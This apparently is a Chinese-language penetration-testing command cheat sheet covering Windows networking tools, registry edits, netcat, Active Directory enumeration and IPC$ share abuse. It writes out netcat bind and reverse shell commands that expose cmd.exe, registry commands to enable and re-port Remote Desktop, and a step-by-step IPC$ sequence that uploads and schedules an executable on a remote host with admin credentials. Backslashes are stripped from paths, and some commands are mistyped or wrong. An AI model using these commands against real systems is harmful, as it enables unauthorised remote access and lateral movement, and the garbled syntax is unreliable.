滲透基礎——命令
NETSTAT
作用:顯示協議統計信息和當前TCP/IP網路連接
netstat -a 顯示所有連接和偵聽埠
netstat -ano 顯示所有連接和偵聽埠,以數字形式顯示進程ID
netstat -r 顯示路由表(等價於 route print)
netstat -f 顯示本機與外部連接(NT6.0以上)
netstat -b 擁有足夠許可權可以查看每個連接及偵聽埠所涉及的可執行程序
netstat -p TCP 查看連接中使用的協議
NBTSTAT
作用:顯示本地計算機和遠程計算機的基於TCP/IP(NetBT)協議的NetBIOS統計資料、NetBIOS名稱表和NetBIOS名稱緩存
NBTSTAT 格式:nbtstat [-a remotename] [-A ip address] [-c] [-n] [-R] [-RR] [-s][-S]
[interval]
nbtstat -acleanxp 列出指定名稱的遠程機器的名稱表
nbtstat -AIP 列出指定IP地址的遠程機器的名稱表
nbtstat -n 列出本地NetBIOS名稱
nbtstat -R 清除NetBIOS名稱緩存並重新裝載到本地 Lmhosts(c:windowssystem32driversetclmhosts.sam)
文件中 帶標記#PRE的項目
REG(winxp提供的,可以添加、更改和顯示註冊表項中的注冊表子項信息和值)
REG QUERY 查詢(顯示註冊表項setup下所有子項和值)
REG ADD 增加(添加註冊表項、值)
REG DELETE 刪除(刪除註冊表項及其所有子項和值)
REG COPY 拷貝(複製註冊表項及其子項)
REG SAVE 保存(將註冊表項保存到文件)
REG RESTORE 還原註冊表
REG LOAD 載入註冊表文件/項
REG UNLOAD 卸載配置單元的註冊表項
REG COMPARE 註冊表項比較
REG EXPORT 導出註冊表
REG IMPORT 導入註冊表
HKCR:HKEY_CLASSES_ROOT
基層類別鍵,用於定義系統中所有已經註冊的文件擴展名、文件類型、文件圖標等
HKCU:HKEY_CURRENT_USER
定義當前用戶的所有許可權
HKLM:HKEY_LOCAL_MACHINE
定義相對網路環境而言的本地計算機軟硬體的全部信息
HKU:HKEY_USERS
定義所用的用戶信息,其中部分分支將映射到HKEY_CUQQENT_USER關鍵字中,大部分設置都可以通過控制面板來修改
HKCC:HKEY_CURRENT_CONFIG
定義計算機的當前配置情況,實際上就是指向HKEY_LOCAL_MASHINEConfig 結構中的某個分支的指針
REGADD(將新的子項或項添加到註冊表中)
語法:red addkeyName [/v EntryName|/ve] [/t Data Type]
[/s separator] [/d value][/f]
參數:keyName
指定子項的完全路徑。有效子目錄樹為HKLM、HKCU、HKCR、HKU以及HKCC。遠程機器上只有HKLM和HKU
/V EntryName 指定要添加到指定子項下的項名稱
/ve 指定添加到註冊表中的項為空值
/t DataType 指定項值的數據類型
DataType可以是以下幾種類型:
REG-SZ
REG-MULTI-SZ
REG-DWORD-BIG-ENDIAN
REG-DWORD
REG-BINARY
REG-DWORD-LITTLE-ENDIAN
REG-LINK
REG-FULL-RESOURCE-DESCRIPTOR
REG-EXPAND-SZ
/s separator 指定用於分隔多個數據實例的字元
/d value 指定新註冊表項的值
/f 不用詢問信息而直接添加子項或項
/? 顯示幫助
REG QUERY(返回註冊表的子項下的項和下一層子項的列表)
語法:reg query keyName [{/v EntryName | /ve}][/s]
/v EntryName 返回特定的項及其值
/ve 指定僅返回為空值的項
/s 將返回各個層中的所有子項和項
查看註冊表遠程桌面的埠號
REG queryHKLMSYSTEMCurrentControlsetControlTerminal」 」ServerWinStationsRDP-TCP /v PortNumber
開啟3389
REG queryHKLMSYSTEMCurrentControlsetControlTerminal」 」Server /v fDenyTSconnections /t REG-DWORD /d 00000000 /f
修改埠為2008(0x7d8)
REG ADD HKLMSYSTEMCurrentControlsetControlTerminal」 」Serverwds
dpwdTds cp /vPortNumber /t REG-DWORD /d 0X7d8 /f
REG ADD HKLMSYSTEMCurrentControlsetControlTerminal」」ServerWinStationsRDP-TCP /vPortNumber /t REG-DWORD /d 0x7d8 /f
SC(用來與服務控制管理器和服務進行通信)
sc query/queryex 查詢服務的狀態/查詢服務的擴展狀態
scconfig 更改服務的配置
sc stop 向服務發送stop請求
sc delete (從註冊表中)刪除服務
sc start 啟動服務
sc pause 向服務發送PAUSE控制請求
sc continue 向服務發送CONTINUE控制請求
type:顯示文本文件內容
rar
-a 添加文件到壓縮文件
-e 解壓壓縮文件到當前目錄
-p[密碼] 設置密碼
壓縮: ① 【未加密】rar a F: est1.rar F: emp
② 【加密】 rar a -p password F: est1.rar F: emp
解壓: ① rar e F: est1.rar E: est
② rar e -ppassword F: est1.rar E: est
nc
網路安全界的「瑞士軍刀」,一個簡單而有用的工具,透過使用TCP或UDP協議的網路連接去讀寫數據
-l 監聽模式,用於入站連接
-w secs timeout的時間
-L 連接關閉後,仍然繼續監聽
-n 指定數字的IP地址,不能用hostname
-p port 本地埠號
-v 詳細輸出,用兩個-v可得到更詳細的內容
-z 將輸入輸出關掉,用於掃描時
①連接到遠程主機:
格式:nc -nvv 192.168.x.x 80
講解:連接 192.168.x.x的TCP 80埠
②監聽本地主機
格式:nc -l -vv -p 80
講解:監聽本機的TCP 80埠
③掃描遠程主機
格式:nc -nvv -w2 -z 192.168.x.x 80 -445
講解:掃描192.168.x.x的TCP 80到TCP 445的所有埠
④遠程主機綁定shell
格式:nc -l -p 5354 -t -e c:winntsystem32 cmd.exe
講解:綁定遠程主機的cmdshell 在遠程主機的TCP 5354埠
⑤遠程主機綁定shell並反向連接
格式:nc -t -e c:winntsystem32cmd.exe 192.168.x.x 5354
講解:綁定遠程主機的cmdshell 並反向連接到192.168.x.x的TCP 5354埠
域命令
1、域內添加用戶
net user username pass /add/domain
2、域內禁用用戶
net userusername /active:no/domain
3、域內激活用戶
net user username /active:yes/domain
4、域內刪除用戶
net user username /del/domain
5、列出域內所有的機器名
desquery computer domainroot -limit 0
net group 「domain computers」 /domain
6、列出域內所有的用戶
dsquery user domainroot -limit 0
net user /domain
7、列出域內的內網劃分
dsquery subnet
8、列出域內的所有分組
dsquery group
net group /domain
9、列出域控制器(域控,DC)
dsquery server
net group 「domain controllers」 /domain
10、列出域管理員用戶
net group 「domain admins」 /domain
11、列出域列表
net view /domain
12、查看當前域活動機器列表
net view /domain:DC name
IPC$(依賴139 445埠)
場景:遠程機器192.168.123.123,用戶名為:administrator,密碼為:abc@123
(1)建立ipc$連接
net use \192.168.123.123ipc$ "abc@123" /user:administrator
(一定要注意:這一行命令中包含了3個空格)
(2)列遠程機器admin$目錄
dir \192.168.123.123admin$
(3)把本地的c:
tlm.exe文件拷貝到遠程的主機上
copyc:
tlm.exe \192.168.123.123admin$
(4)查看遠程機器時間
nettime \192.168.123.123
(5)在下一個時間點運行上傳的文件ntlm.exe(當前時間為:14:57)
at\192.168.123.123 15:00 ntlm.exe
(6)刪除遠程機器上ntlm.exe文件
del \192.168.123.123admin$
tlm.exe /f/q
(7)把對方的磁碟C映射為本地的Z盤
netuse z: \192.168.123.123c$
(8)刪除磁碟映射連接
netuse z: /del
(9)刪除IPC$連接
netuse \192.168.123.123ipc$ /del
netuse * /del
IPC$ 依賴哪些服務
開啟IPC$共享
啟動lanmanworkstations服務(顯示名:workstations)
啟動lanmanserver服務(顯示名:server)
啟動netlogon
打開139、445埠
Ipc$常見的錯誤代碼及原因
錯誤號5,拒絕訪問:很可能你使用的用戶不是管理員許可權的;
錯誤號51,Windows無法找到網路路徑:網路有問題;
錯誤號53,找不到網路路徑:ip地址錯誤;目標未開機;目標lanmanserver服務未啟動;目標有防火牆(埠過濾);
錯誤號67,找不到網路名:你的lanmanworkstation服務未啟動或者目標刪除了ipc$;
錯誤號1219,提供的憑據與已存在的憑據集衝突:你已經和對方建立了一個ipc$,請刪除再連;
錯誤號1326,未知的用戶名或錯誤密碼:原因很明顯了;
錯誤號1792,試圖登錄,但是網路登錄服務沒有啟動:目標NetLogon服務未啟動;
錯誤號2242,此用戶的密碼已經過期:目標有帳號策略,強制定期要求更改密碼。
TAG:WEB安全之路 |